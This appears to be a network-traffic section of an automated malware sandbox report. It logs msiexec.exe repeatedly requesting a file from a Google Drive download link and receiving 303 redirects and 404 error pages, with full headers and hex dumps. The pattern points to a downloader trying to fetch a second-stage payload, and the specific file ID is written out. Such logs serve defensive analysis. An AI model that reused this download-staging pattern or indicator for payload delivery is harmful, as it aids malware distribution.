                                                              2025-01-10 23:02:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 44 45 30 32 70 2d 52 50 35 34 5f 4f 56 57 58 77 34 34 53 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lDE02p-RP54_OVWXw44S-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.849718216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:02 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:02 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:02 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-hVTXnmbWDXyqi_VkCpluGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.849719172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:03 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:04 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTkDFZ9pp_Fw8duLMVYfMBDavI60UkdmZSHUSUc7LYefcMbcfHz1W8v9kTjGA49EUa3
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:04 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-l8jo_H8gaoWziyYY3X4MzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 4c 4f 45 46 6a 79 50 76 44 70 38 76 75 4d 43 5f 55 30 72 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uLOEFjyPvDp8vuMC_U0r0w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.849720216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:05 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:05 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:05 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-WFO1wGsjRyLOMfRLWX2ErQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.849722172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:06 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:06 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgT042Xx1yiKIpgnG8UgUdnKee3U49v8f1Nxsa6eQvxdiitBrXc4tCxQOm3iQDFXJmsSVip8DyU
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:06 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-ge_DCY5KgpT5ysQFypfODw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 36 2d 5f 48 53 6b 77 38 59 5a 4d 32 6e 4a 57 75 36 30 69 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S6-_HSkw8YZM2nJWu60ibA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.849723216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:07 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:07 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:07 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-nWv8uOQV_ofQ7-nN6CLaqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.849724172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:08 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:08 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6L1Otzde4zST6UBMOkjq93vnrVojAnxa30fYbeG4c4ggJ2aeTqi23Ev95Zeb1MMkpB8gRAWlE
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:08 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-PbB5PoVftRiMW_YS3Qqfog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 32 63 53 42 66 34 34 59 41 69 4a 51 77 44 67 66 54 2d 55 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e2cSBf44YAiJQwDgfT-UJQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.849725216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:09 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:10 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:10 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-51VJgNRq200pZVTl7zUPuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.849726172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:10 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:11 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTYEdbnO0Ao-2W0BCwAyqt0AgKd8ZMhAjfVy6vafgOMO19eymXO0mPW5P3eeLQ3ren3
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:11 GMT
                                                              Content-Security-Policy: script-src 'nonce-5ReVMcLKSnI00rHcgXEKcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
